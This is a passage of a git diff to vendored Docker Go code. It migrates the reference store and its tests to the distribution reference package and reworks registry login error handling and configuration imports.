t.Fatalf("Expected invalid repo name for %q", name) - } - } - - for _, name := range validRepoNames { - _, err := ParseNamed(name) - if err != nil { - t.Fatalf("Error parsing repo name %s, got: %q", name, err) - } - } -} - -func TestValidateRemoteName(t *testing.T) { - validRepositoryNames := []string{ - // Sanity check. - "docker/docker", - - // Allow 64-character non-hexadecimal names (hexadecimal names are forbidden). - "thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev", - - // Allow embedded hyphens. - "docker-rules/docker", - - // Allow multiple hyphens as well. - "docker---rules/docker", - - //Username doc and image name docker being tested. - "doc/docker", - - // single character names are now allowed. - "d/docker", - "jess/t", - - // Consecutive underscores. - "dock__er/docker", - } - for _, repositoryName := range validRepositoryNames { - _, err := ParseNamed(repositoryName) - if err != nil { - t.Errorf("Repository name should be valid: %v. Error: %v", repositoryName, err) - } - } - - invalidRepositoryNames := []string{ - // Disallow capital letters. - "docker/Docker", - - // Only allow one slash. - "docker///docker", - - // Disallow 64-character hexadecimal. - "1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", - - // Disallow leading and trailing hyphens in namespace. - "-docker/docker", - "docker-/docker", - "-docker-/docker", - - // Don't allow underscores everywhere (as opposed to hyphens). - "____/____", - - "_docker/_docker", - - // Disallow consecutive periods. - "dock..er/docker", - "dock_.er/docker", - "dock-.er/docker", - - // No repository. 
- "docker/", - - //namespace too long - "this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255/docker", - } - for _, repositoryName := range invalidRepositoryNames { - if _, err := ParseNamed(repositoryName); err == nil { - t.Errorf("Repository name should be invalid: %v", repositoryName) - } - } -} - -func TestParseRepositoryInfo(t *testing.T) { - type tcase struct { - RemoteName, NormalizedName, FullName, AmbiguousName, Hostname string - } - - tcases := []tcase{ - { - RemoteName: "fooo/bar", - NormalizedName: "fooo/bar", - FullName: "docker.io/fooo/bar", - AmbiguousName: "index.docker.io/fooo/bar", - Hostname: "docker.io", - }, - { - RemoteName: "library/ubuntu", - NormalizedName: "ubuntu", - FullName: "docker.io/library/ubuntu", - AmbiguousName: "library/ubuntu", - Hostname: "docker.io", - }, - { - RemoteName: "nonlibrary/ubuntu", - NormalizedName: "nonlibrary/ubuntu", - FullName: "docker.io/nonlibrary/ubuntu", - AmbiguousName: "", - Hostname: "docker.io", - }, - { - RemoteName: "other/library", - NormalizedName: "other/library", - FullName: "docker.io/other/library", - AmbiguousName: "", - Hostname: "docker.io", - }, - { - RemoteName: "private/moonbase", - NormalizedName: "127.0.0.1:8000/private/moonbase", - FullName: "127.0.0.1:8000/private/moonbase", - AmbiguousName: "", - Hostname: "127.0.0.1:8000", - }, - { - RemoteName: "privatebase", - NormalizedName: "127.0.0.1:8000/privatebase", - FullName: "127.0.0.1:8000/privatebase", - AmbiguousName: "", - Hostname: "127.0.0.1:8000", - }, - { - RemoteName: "private/moonbase", - NormalizedName: "example.com/private/moonbase", - FullName: "example.com/private/moonbase", - AmbiguousName: "", - Hostname: "example.com", - }, - { - RemoteName: "privatebase", - NormalizedName: "example.com/privatebase", - 
FullName: "example.com/privatebase", - AmbiguousName: "", - Hostname: "example.com", - }, - { - RemoteName: "private/moonbase", - NormalizedName: "example.com:8000/private/moonbase", - FullName: "example.com:8000/private/moonbase", - AmbiguousName: "", - Hostname: "example.com:8000", - }, - { - RemoteName: "privatebasee", - NormalizedName: "example.com:8000/privatebasee", - FullName: "example.com:8000/privatebasee", - AmbiguousName: "", - Hostname: "example.com:8000", - }, - { - RemoteName: "library/ubuntu-12.04-base", - NormalizedName: "ubuntu-12.04-base", - FullName: "docker.io/library/ubuntu-12.04-base", - AmbiguousName: "index.docker.io/library/ubuntu-12.04-base", - Hostname: "docker.io", - }, - } - - for _, tcase := range tcases { - refStrings := []string{tcase.NormalizedName, tcase.FullName} - if tcase.AmbiguousName != "" { - refStrings = append(refStrings, tcase.AmbiguousName) - } - - var refs []Named - for _, r := range refStrings { - named, err := ParseNamed(r) - if err != nil { - t.Fatal(err) - } - refs = append(refs, named) - named, err = WithName(r) - if err != nil { - t.Fatal(err) - } - refs = append(refs, named) - } - - for _, r := range refs { - if expected, actual := tcase.NormalizedName, r.Name(); expected != actual { - t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual) - } - if expected, actual := tcase.FullName, r.FullName(); expected != actual { - t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual) - } - if expected, actual := tcase.Hostname, r.Hostname(); expected != actual { - t.Fatalf("Invalid hostname for %q. Expected %q, got %q", r, expected, actual) - } - if expected, actual := tcase.RemoteName, r.RemoteName(); expected != actual { - t.Fatalf("Invalid remoteName for %q. 
Expected %q, got %q", r, expected, actual) - } - - } - } -} - -func TestParseReferenceWithTagAndDigest(t *testing.T) { - ref, err := ParseNamed("busybox:latest@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa") - if err != nil { - t.Fatal(err) - } - if _, isTagged := ref.(NamedTagged); isTagged { - t.Fatalf("Reference from %q should not support tag", ref) - } - if _, isCanonical := ref.(Canonical); !isCanonical { - t.Fatalf("Reference from %q should not support digest", ref) - } - if expected, actual := "busybox@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa", ref.String(); actual != expected { - t.Fatalf("Invalid parsed reference for %q: expected %q, got %q", ref, expected, actual) - } -} - -func TestInvalidReferenceComponents(t *testing.T) { - if _, err := WithName("-foo"); err == nil { - t.Fatal("Expected WithName to detect invalid name") - } - ref, err := WithName("busybox") - if err != nil { - t.Fatal(err) - } - if _, err := WithTag(ref, "-foo"); err == nil { - t.Fatal("Expected WithName to detect invalid tag") - } - if _, err := WithDigest(ref, digest.Digest("foo")); err == nil { - t.Fatal("Expected WithName to detect invalid digest") - } -} diff --git a/vendor/github.com/docker/docker/reference/store.go b/vendor/github.com/docker/docker/reference/store.go index 71ca236c9c..b01051bf58 100644 --- a/vendor/github.com/docker/docker/reference/store.go +++ b/vendor/github.com/docker/docker/reference/store.go @@ -1,38 +1,39 @@ -package reference +package reference // import "github.com/docker/docker/reference" import ( "encoding/json" - "errors" "fmt" "os" "path/filepath" "sort" "sync" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/pkg/ioutils" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" ) var ( // ErrDoesNotExist is returned if a reference is not found in the // store. 
- ErrDoesNotExist = errors.New("reference does not exist") + ErrDoesNotExist notFoundError = "reference does not exist" ) // An Association is a tuple associating a reference with an image ID. type Association struct { - Ref Named + Ref reference.Named ID digest.Digest } -// Store provides the set of methods which can operate on a tag store. +// Store provides the set of methods which can operate on a reference store. type Store interface { - References(id digest.Digest) []Named - ReferencesByName(ref Named) []Association - AddTag(ref Named, id digest.Digest, force bool) error - AddDigest(ref Canonical, id digest.Digest, force bool) error - Delete(ref Named) (bool, error) - Get(ref Named) (digest.Digest, error) + References(id digest.Digest) []reference.Named + ReferencesByName(ref reference.Named) []Association + AddTag(ref reference.Named, id digest.Digest, force bool) error + AddDigest(ref reference.Canonical, id digest.Digest, force bool) error + Delete(ref reference.Named) (bool, error) + Get(ref reference.Named) (digest.Digest, error) } type store struct { @@ -44,24 +45,28 @@ type store struct { Repositories map[string]repository // referencesByIDCache is a cache of references indexed by ID, to speed // up References. - referencesByIDCache map[digest.Digest]map[string]Named + referencesByIDCache map[digest.Digest]map[string]reference.Named } // Repository maps tags to digests. The key is a stringified Reference, // including the repository name. 
type repository map[string]digest.Digest -type lexicalRefs []Named +type lexicalRefs []reference.Named -func (a lexicalRefs) Len() int { return len(a) } -func (a lexicalRefs) Swap(i, j int) { a[i], a[j] = a[j], a[i] } -func (a lexicalRefs) Less(i, j int) bool { return a[i].String() < a[j].String() } +func (a lexicalRefs) Len() int { return len(a) } +func (a lexicalRefs) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a lexicalRefs) Less(i, j int) bool { + return a[i].String() < a[j].String() +} type lexicalAssociations []Association -func (a lexicalAssociations) Len() int { return len(a) } -func (a lexicalAssociations) Swap(i, j int) { a[i], a[j] = a[j], a[i] } -func (a lexicalAssociations) Less(i, j int) bool { return a[i].Ref.String() < a[j].Ref.String() } +func (a lexicalAssociations) Len() int { return len(a) } +func (a lexicalAssociations) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a lexicalAssociations) Less(i, j int) bool { + return a[i].Ref.String() < a[j].Ref.String() +} // NewReferenceStore creates a new reference store, tied to a file path where // the set of references are serialized in JSON format. @@ -74,7 +79,7 @@ func NewReferenceStore(jsonPath string) (Store, error) { store := &store{ jsonPath: abspath, Repositories: make(map[string]repository), - referencesByIDCache: make(map[digest.Digest]map[string]Named), + referencesByIDCache: make(map[digest.Digest]map[string]reference.Named), } // Load the json file if it exists, otherwise create it. if err := store.reload(); os.IsNotExist(err) { @@ -89,43 +94,72 @@ func NewReferenceStore(jsonPath string) (Store, error) { // AddTag adds a tag reference to the store. If force is set to true, existing // references can be overwritten. This only works for tags, not digests. 
-func (store *store) AddTag(ref Named, id digest.Digest, force bool) error { - if _, isCanonical := ref.(Canonical); isCanonical { - return errors.New("refusing to create a tag with a digest reference") +func (store *store) AddTag(ref reference.Named, id digest.Digest, force bool) error { + if _, isCanonical := ref.(reference.Canonical); isCanonical { + return errors.WithStack(invalidTagError("refusing to create a tag with a digest reference")) } - return store.addReference(WithDefaultTag(ref), id, force) + return store.addReference(reference.TagNameOnly(ref), id, force) } // AddDigest adds a digest reference to the store. -func (store *store) AddDigest(ref Canonical, id digest.Digest, force bool) error { +func (store *store) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error { return store.addReference(ref, id, force) } -func (store *store) addReference(ref Named, id digest.Digest, force bool) error { - if ref.Name() == string(digest.Canonical) { - return errors.New("refusing to create an ambiguous tag using digest algorithm as name") +func favorDigest(originalRef reference.Named) (reference.Named, error) { + ref := originalRef + // If the reference includes a digest and a tag, we must store only the + // digest. 
+ canonical, isCanonical := originalRef.(reference.Canonical) + _, isNamedTagged := originalRef.(reference.NamedTagged) + + if isCanonical && isNamedTagged { + trimmed, err := reference.WithDigest(reference.TrimNamed(canonical), canonical.Digest()) + if err != nil { + // should never happen + return originalRef, err + } + ref = trimmed + } + return ref, nil +} + +func (store *store) addReference(ref reference.Named, id digest.Digest, force bool) error { + ref, err := favorDigest(ref) + if err != nil { + return err + } + + refName := reference.FamiliarName(ref) + refStr := reference.FamiliarString(ref) + + if refName == string(digest.Canonical) { + return errors.WithStack(invalidTagError("refusing to create an ambiguous tag using digest algorithm as name")) } store.mu.Lock() defer store.mu.Unlock() - repository, exists := store.Repositories[ref.Name()] + repository, exists := store.Repositories[refName] if !exists || repository == nil { repository = make(map[string]digest.Digest) - store.Repositories[ref.Name()] = repository + store.Repositories[refName] = repository } - refStr := ref.String() oldID, exists := repository[refStr] if exists { // force only works for tags - if digested, isDigest := ref.(Canonical); isDigest { - return fmt.Errorf("Cannot overwrite digest %s", digested.Digest().String()) + if digested, isDigest := ref.(reference.Canonical); isDigest { + return errors.WithStack(conflictingTagError("Cannot overwrite digest " + digested.Digest().String())) } if !force { - return fmt.Errorf("Conflict: Tag %s is already set to image %s, if you want to replace it, please use -f option", ref.String(), oldID.String()) + return errors.WithStack( + conflictingTagError( + fmt.Sprintf("Conflict: Tag %s is already set to image %s, if you want to replace it, please use the force option", refStr, oldID.String()), + ), + ) } if store.referencesByIDCache[oldID] != nil { @@ -138,7 +172,7 @@ func (store *store) addReference(ref Named, id digest.Digest, force bool) error 
repository[refStr] = id if store.referencesByIDCache[id] == nil { - store.referencesByIDCache[id] = make(map[string]Named) + store.referencesByIDCache[id] = make(map[string]reference.Named) } store.referencesByIDCache[id][refStr] = ref @@ -147,24 +181,29 @@ func (store *store) addReference(ref Named, id digest.Digest, force bool) error // Delete deletes a reference from the store. It returns true if a deletion // happened, or false otherwise. -func (store *store) Delete(ref Named) (bool, error) { - ref = WithDefaultTag(ref) +func (store *store) Delete(ref reference.Named) (bool, error) { + ref, err := favorDigest(ref) + if err != nil { + return false, err + } + + ref = reference.TagNameOnly(ref) + + refName := reference.FamiliarName(ref) + refStr := reference.FamiliarString(ref) store.mu.Lock() defer store.mu.Unlock() - repoName := ref.Name() - - repository, exists := store.Repositories[repoName] + repository, exists := store.Repositories[refName] if !exists { return false, ErrDoesNotExist } - refStr := ref.String() if id, exists := repository[refStr]; exists { delete(repository, refStr) if len(repository) == 0 { - delete(store.Repositories, repoName) + delete(store.Repositories, refName) } if store.referencesByIDCache[id] != nil { delete(store.referencesByIDCache[id], refStr) @@ -179,18 +218,34 @@ func (store *store) Delete(ref Named) (bool, error) { } // Get retrieves an item from the store by reference -func (store *store) Get(ref Named) (digest.Digest, error) { - ref = WithDefaultTag(ref) +func (store *store) Get(ref reference.Named) (digest.Digest, error) { + if canonical, ok := ref.(reference.Canonical); ok { + // If reference contains both tag and digest, only + // lookup by digest as it takes precedence over + // tag, until tag/digest combos are stored. 
+ if _, ok := ref.(reference.Tagged); ok { + var err error + ref, err = reference.WithDigest(reference.TrimNamed(canonical), canonical.Digest()) + if err != nil { + return "", err + } + } + } else { + ref = reference.TagNameOnly(ref) + } + + refName := reference.FamiliarName(ref) + refStr := reference.FamiliarString(ref) store.mu.RLock() defer store.mu.RUnlock() - repository, exists := store.Repositories[ref.Name()] + repository, exists := store.Repositories[refName] if !exists || repository == nil { return "", ErrDoesNotExist } - id, exists := repository[ref.String()] + id, exists := repository[refStr] if !exists { return "", ErrDoesNotExist } @@ -200,7 +255,7 @@ func (store *store) Get(ref Named) (digest.Digest, error) { // References returns a slice of references to the given ID. The slice // will be nil if there are no references to this ID. -func (store *store) References(id digest.Digest) []Named { +func (store *store) References(id digest.Digest) []reference.Named { store.mu.RLock() defer store.mu.RUnlock() @@ -208,7 +263,7 @@ func (store *store) References(id digest.Digest) []Named { // 1) We must not return a mutable // 2) It would be ugly to expose the extraneous map keys to callers. - var references []Named + var references []reference.Named for _, ref := range store.referencesByIDCache[id] { references = append(references, ref) } @@ -221,18 +276,20 @@ func (store *store) References(id digest.Digest) []Named { // ReferencesByName returns the references for a given repository name. // If there are no references known for this repository name, // ReferencesByName returns nil. 
-func (store *store) ReferencesByName(ref Named) []Association { +func (store *store) ReferencesByName(ref reference.Named) []Association { + refName := reference.FamiliarName(ref) + store.mu.RLock() defer store.mu.RUnlock() - repository, exists := store.Repositories[ref.Name()] + repository, exists := store.Repositories[refName] if !exists { return nil } var associations []Association for refStr, refID := range repository { - ref, err := ParseNamed(refStr) + ref, err := reference.ParseNormalizedNamed(refStr) if err != nil { // Should never happen return nil @@ -270,13 +327,13 @@ func (store *store) reload() error { for _, repository := range store.Repositories { for refStr, refID := range repository { - ref, err := ParseNamed(refStr) + ref, err := reference.ParseNormalizedNamed(refStr) if err != nil { // Should never happen continue } if store.referencesByIDCache[refID] == nil { - store.referencesByIDCache[refID] = make(map[string]Named) + store.referencesByIDCache[refID] = make(map[string]reference.Named) } store.referencesByIDCache[refID][refStr] = ref } diff --git a/vendor/github.com/docker/docker/reference/store_test.go b/vendor/github.com/docker/docker/reference/store_test.go index dd1d253d8e..1ce674cbfb 100644 --- a/vendor/github.com/docker/docker/reference/store_test.go +++ b/vendor/github.com/docker/docker/reference/store_test.go @@ -1,4 +1,4 @@ -package reference +package reference // import "github.com/docker/docker/reference" import ( "bytes" @@ -8,7 +8,10 @@ import ( "strings" "testing" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var ( @@ -45,7 +48,7 @@ func TestLoad(t *testing.T) { } for refStr, expectedID := range saveLoadTestCases { - ref, err := ParseNamed(refStr) + ref, err := reference.ParseNormalizedNamed(refStr) if err != nil { t.Fatalf("failed to parse reference: %v", err) } @@ -61,10 +64,10 @@ func 
TestLoad(t *testing.T) { func TestSave(t *testing.T) { jsonFile, err := ioutil.TempFile("", "tag-store-test") - if err != nil { - t.Fatalf("error creating temp file: %v", err) - } + assert.NilError(t, err) + _, err = jsonFile.Write([]byte(`{}`)) + assert.NilError(t, err) jsonFile.Close() defer os.RemoveAll(jsonFile.Name()) @@ -74,11 +77,11 @@ func TestSave(t *testing.T) { } for refStr, id := range saveLoadTestCases { - ref, err := ParseNamed(refStr) + ref, err := reference.ParseNormalizedNamed(refStr) if err != nil { t.Fatalf("failed to parse reference: %v", err) } - if canonical, ok := ref.(Canonical); ok { + if canonical, ok := ref.(reference.Canonical); ok { err = store.AddDigest(canonical, id, false) if err != nil { t.Fatalf("could not add digest reference %s: %v", refStr, err) @@ -120,7 +123,7 @@ func TestAddDeleteGet(t *testing.T) { testImageID3 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9e") // Try adding a reference with no tag or digest - nameOnly, err := WithName("username/repo") + nameOnly, err := reference.ParseNormalizedNamed("username/repo") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -129,7 +132,7 @@ func TestAddDeleteGet(t *testing.T) { } // Add a few references - ref1, err := ParseNamed("username/repo1:latest") + ref1, err := reference.ParseNormalizedNamed("username/repo1:latest") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -137,7 +140,7 @@ func TestAddDeleteGet(t *testing.T) { t.Fatalf("error adding to store: %v", err) } - ref2, err := ParseNamed("username/repo1:old") + ref2, err := reference.ParseNormalizedNamed("username/repo1:old") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -145,7 +148,7 @@ func TestAddDeleteGet(t *testing.T) { t.Fatalf("error adding to store: %v", err) } - ref3, err := ParseNamed("username/repo1:alias") + ref3, err := reference.ParseNormalizedNamed("username/repo1:alias") if err != nil { t.Fatalf("could not 
parse reference: %v", err) } @@ -153,7 +156,7 @@ func TestAddDeleteGet(t *testing.T) { t.Fatalf("error adding to store: %v", err) } - ref4, err := ParseNamed("username/repo2:latest") + ref4, err := reference.ParseNormalizedNamed("username/repo2:latest") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -161,11 +164,11 @@ func TestAddDeleteGet(t *testing.T) { t.Fatalf("error adding to store: %v", err) } - ref5, err := ParseNamed("username/repo3@sha256:58153dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c") + ref5, err := reference.ParseNormalizedNamed("username/repo3@sha256:58153dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c") if err != nil { t.Fatalf("could not parse reference: %v", err) } - if err = store.AddDigest(ref5.(Canonical), testImageID2, false); err != nil { + if err = store.AddDigest(ref5.(reference.Canonical), testImageID2, false); err != nil { t.Fatalf("error adding to store: %v", err) } @@ -228,7 +231,7 @@ func TestAddDeleteGet(t *testing.T) { } // Get should return ErrDoesNotExist for a nonexistent repo - nonExistRepo, err := ParseNamed("username/nonexistrepo:latest") + nonExistRepo, err := reference.ParseNormalizedNamed("username/nonexistrepo:latest") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -237,7 +240,7 @@ func TestAddDeleteGet(t *testing.T) { } // Get should return ErrDoesNotExist for a nonexistent tag - nonExistTag, err := ParseNamed("username/repo1:nonexist") + nonExistTag, err := reference.ParseNormalizedNamed("username/repo1:nonexist") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -263,7 +266,7 @@ func TestAddDeleteGet(t *testing.T) { } // Check ReferencesByName - repoName, err := WithName("username/repo1") + repoName, err := reference.ParseNormalizedNamed("username/repo1") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -303,19 +306,19 @@ func TestAddDeleteGet(t *testing.T) { } // Delete a few references - if deleted, err := 
store.Delete(ref1); err != nil || deleted != true { + if deleted, err := store.Delete(ref1); err != nil || !deleted { t.Fatal("Delete failed") } if _, err := store.Get(ref1); err != ErrDoesNotExist { t.Fatal("Expected ErrDoesNotExist from Get") } - if deleted, err := store.Delete(ref5); err != nil || deleted != true { + if deleted, err := store.Delete(ref5); err != nil || !deleted { t.Fatal("Delete failed") } if _, err := store.Get(ref5); err != ErrDoesNotExist { t.Fatal("Expected ErrDoesNotExist from Get") } - if deleted, err := store.Delete(nameOnly); err != nil || deleted != true { + if deleted, err := store.Delete(nameOnly); err != nil || !deleted { t.Fatal("Delete failed") } if _, err := store.Get(nameOnly); err != ErrDoesNotExist { @@ -325,32 +328,23 @@ func TestAddDeleteGet(t *testing.T) { func TestInvalidTags(t *testing.T) { tmpDir, err := ioutil.TempDir("", "tag-store-test") + assert.NilError(t, err) defer os.RemoveAll(tmpDir) store, err := NewReferenceStore(filepath.Join(tmpDir, "repositories.json")) - if err != nil { - t.Fatalf("error creating tag store: %v", err) - } + assert.NilError(t, err) id := digest.Digest("sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6") // sha256 as repo name - ref, err := ParseNamed("sha256:abc") - if err != nil { - t.Fatal(err) - } + ref, err := reference.ParseNormalizedNamed("sha256:abc") + assert.NilError(t, err) err = store.AddTag(ref, id, true) - if err == nil { - t.Fatalf("expected setting tag %q to fail", ref) - } + assert.Check(t, is.ErrorContains(err, "")) // setting digest as a tag - ref, err = ParseNamed("registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6") - if err != nil { - t.Fatal(err) - } - err = store.AddTag(ref, id, true) - if err == nil { - t.Fatalf("expected setting digest %q to fail", ref) - } + ref, err = reference.ParseNormalizedNamed("registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6") + assert.NilError(t, err) + err = 
store.AddTag(ref, id, true) + assert.Check(t, is.ErrorContains(err, "")) } diff --git a/vendor/github.com/docker/docker/registry/auth.go b/vendor/github.com/docker/docker/registry/auth.go index 8cadd51ba0..1f2043a0d9 100644 --- a/vendor/github.com/docker/docker/registry/auth.go +++ b/vendor/github.com/docker/docker/registry/auth.go @@ -1,19 +1,20 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( - "fmt" "io/ioutil" "net/http" "net/url" "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/distribution/registry/client/auth" "github.com/docker/distribution/registry/client/auth/challenge" "github.com/docker/distribution/registry/client/transport" "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) const ( @@ -23,21 +24,15 @@ const ( // loginV1 tries to register/login to the v1 registry server. func loginV1(authConfig *types.AuthConfig, apiEndpoint APIEndpoint, userAgent string) (string, string, error) { - registryEndpoint, err := apiEndpoint.ToV1Endpoint(userAgent, nil) - if err != nil { - return "", "", err - } - + registryEndpoint := apiEndpoint.ToV1Endpoint(userAgent, nil) serverAddress := registryEndpoint.String() logrus.Debugf("attempting v1 login to registry endpoint %s", serverAddress) if serverAddress == "" { - return "", "", fmt.Errorf("Server Error: Server Address not set.") + return "", "", errdefs.System(errors.New("server Error: Server Address not set")) } - loginAgainstOfficialIndex := serverAddress == IndexServer - req, err := http.NewRequest("GET", serverAddress+"users/", nil) if err != nil { return "", "", err @@ -53,27 +48,23 @@ func loginV1(authConfig *types.AuthConfig, apiEndpoint APIEndpoint, userAgent st defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil { - return "", "", err + return "", "", errdefs.System(err) } - if 
resp.StatusCode == http.StatusOK { + + switch resp.StatusCode { + case http.StatusOK: return "Login Succeeded", "", nil - } else if resp.StatusCode == http.StatusUnauthorized { - if loginAgainstOfficialIndex { - return "", "", fmt.Errorf("Wrong login/password, please try again. Haven't got a Docker ID? Create one at https://hub.docker.com") - } - return "", "", fmt.Errorf("Wrong login/password, please try again") - } else if resp.StatusCode == http.StatusForbidden { - if loginAgainstOfficialIndex { - return "", "", fmt.Errorf("Login: Account is not active. Please check your e-mail for a confirmation link.") - } + case http.StatusUnauthorized: + return "", "", errdefs.Unauthorized(errors.New("Wrong login/password, please try again")) + case http.StatusForbidden: // *TODO: Use registry configuration to determine what this says, if anything? - return "", "", fmt.Errorf("Login: Account is not active. Please see the documentation of the registry %s for instructions how to activate it.", serverAddress) - } else if resp.StatusCode == http.StatusInternalServerError { // Issue #14326 + return "", "", errdefs.Forbidden(errors.Errorf("Login: Account is not active. Please see the documentation of the registry %s for instructions how to activate it.", serverAddress)) + case http.StatusInternalServerError: logrus.Errorf("%s returned status code %d. 
Response Body :\n%s", req.URL.String(), resp.StatusCode, body) - return "", "", fmt.Errorf("Internal Server Error") + return "", "", errdefs.System(errors.New("Internal Server Error")) } - return "", "", fmt.Errorf("Login: %s (Code: %d; Headers: %s)", body, - resp.StatusCode, resp.Header) + return "", "", errdefs.System(errors.Errorf("Login: %s (Code: %d; Headers: %s)", body, + resp.StatusCode, resp.Header)) } type loginCredentialStore struct { @@ -135,7 +126,7 @@ func (err fallbackError) Error() string { func loginV2(authConfig *types.AuthConfig, endpoint APIEndpoint, userAgent string) (string, string, error) { logrus.Debugf("attempting v2 login to registry endpoint %s", strings.TrimRight(endpoint.URL.String(), "/")+"/v2/") - modifiers := DockerHeaders(userAgent, nil) + modifiers := Headers(userAgent, nil) authTransport := transport.NewTransport(NewTransport(endpoint.TLSConfig), modifiers...) credentialAuthConfig := *authConfig @@ -159,24 +150,25 @@ func loginV2(authConfig *types.AuthConfig, endpoint APIEndpoint, userAgent strin resp, err := loginClient.Do(req) if err != nil { + err = translateV2AuthError(err) if !foundV2 { err = fallbackError{err: err} } + return "", "", err } defer resp.Body.Close() - if resp.StatusCode != http.StatusOK { - // TODO(dmcgowan): Attempt to further interpret result, status code and error code string - err := fmt.Errorf("login attempt to %s failed with status: %d %s", endpointStr, resp.StatusCode, http.StatusText(resp.StatusCode)) - if !foundV2 { - err = fallbackError{err: err} - } - return "", "", err + if resp.StatusCode == http.StatusOK { + return "Login Succeeded", credentialAuthConfig.IdentityToken, nil } - return "Login Succeeded", credentialAuthConfig.IdentityToken, nil - + // TODO(dmcgowan): Attempt to further interpret result, status code and error code string + err = errors.Errorf("login attempt to %s failed with status: %d %s", endpointStr, resp.StatusCode, http.StatusText(resp.StatusCode)) + if !foundV2 { + err = 
fallbackError{err: err} + } + return "", "", err } func v2AuthHTTPClient(endpoint *url.URL, authTransport http.RoundTripper, modifiers []transport.RequestModifier, creds auth.CredentialStore, scopes []auth.Scope) (*http.Client, bool, error) { @@ -256,6 +248,7 @@ func (err PingResponseError) Error() string { // challenge manager for the supported authentication types and // whether v2 was confirmed by the response. If a response is received but // cannot be interpreted a PingResponseError will be returned. +// nolint: interfacer func PingV2Registry(endpoint *url.URL, transport http.RoundTripper) (challenge.Manager, bool, error) { var ( foundV2 = false diff --git a/vendor/github.com/docker/docker/registry/auth_test.go b/vendor/github.com/docker/docker/registry/auth_test.go index 9ab71aa4fb..f8f3e1997b 100644 --- a/vendor/github.com/docker/docker/registry/auth_test.go +++ b/vendor/github.com/docker/docker/registry/auth_test.go @@ -1,8 +1,4 @@ -// +build !solaris - -// TODO: Support Solaris - -package registry +package registry // import "github.com/docker/docker/registry" import ( "testing" diff --git a/vendor/github.com/docker/docker/registry/config.go b/vendor/github.com/docker/docker/registry/config.go index 9a4f6a9251..de5a526b69 100644 --- a/vendor/github.com/docker/docker/registry/config.go +++ b/vendor/github.com/docker/docker/registry/config.go @@ -1,22 +1,24 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( - "errors" "fmt" "net" "net/url" + "regexp" + "strconv" "strings" + "github.com/docker/distribution/reference" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/opts" - "github.com/docker/docker/reference" - "github.com/spf13/pflag" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // ServiceOptions holds command line options. 
type ServiceOptions struct { - Mirrors []string `json:"registry-mirrors,omitempty"` - InsecureRegistries []string `json:"insecure-registries,omitempty"` + AllowNondistributableArtifacts []string `json:"allow-nondistributable-artifacts,omitempty"` + Mirrors []string `json:"registry-mirrors,omitempty"` + InsecureRegistries []string `json:"insecure-registries,omitempty"` // V2Only controls access to legacy registries. If it is set to true via the // command line flag the daemon will not attempt to contact v1 legacy registries @@ -43,9 +45,6 @@ var ( // IndexName is the name of the index IndexName = "docker.io" - // NotaryServer is the endpoint serving the Notary trust server - NotaryServer = "https://notary.docker.io" - // DefaultV2Registry is the URI of the default v2 registry DefaultV2Registry = &url.URL{ Scheme: "https", @@ -58,40 +57,105 @@ var ( // not have the correct form ErrInvalidRepositoryName = errors.New("Invalid repository name (ex: \"registry.domain.tld/myrepos\")") - emptyServiceConfig = newServiceConfig(ServiceOptions{}) + emptyServiceConfig, _ = newServiceConfig(ServiceOptions{}) +) + +var ( + validHostPortRegex = regexp.MustCompile(`^` + reference.DomainRegexp.String() + `$`) ) // for mocking in unit tests var lookupIP = net.LookupIP -// InstallCliFlags adds command-line options to the top-level flag parser for -// the current process. 
